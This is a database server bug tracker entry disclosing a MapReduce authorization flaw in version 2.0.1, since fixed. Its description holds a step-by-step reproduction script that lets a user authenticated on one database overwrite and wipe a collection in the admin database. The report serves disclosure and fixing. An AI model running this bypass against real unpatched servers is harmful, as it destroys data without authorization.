Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-4471

[SECURITY] MapReduce able to overwrite any collection in any db regardless of authentication

    XMLWordPrintableJSON

Details

    • Icon: Bug Bug
    • Resolution: Done
    • Icon: Major - P3 Major - P3
    • 2.1.0
    • 2.0.1
    • MapReduce, Security
    • None
    • ALL

    Description

      use admin;
      db.addUser("admin", "strongpasswd");
      db.importantCollection.insert(importantData);

      use test;
      db.addUser("testUser", "passwd");

      restart mongo with authentication.

      Now, with the next snippet you can wipe the admin db's importantCollection:
      use test;
      db.auth("testUser", "passwd");
      db.test.insert(

      {foo: "bar"}

      );
      db.runCommand({
      mapreduce: "test",
      map : function Map() {
      emit(this._id, {});
      },
      reduce : function Reduce(key, values)

      { return values[0]; }

      ,
      out :

      { replace: "importantCollection", db: "admin" }

      ,
      });

      In short: you run a M/R on a collection that you have access, but the output is an other db's collection that you have no rights to read or write.

      Attachments

        Activity

          People

            antoine Antoine Girbal
            benedicht György Nagy
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: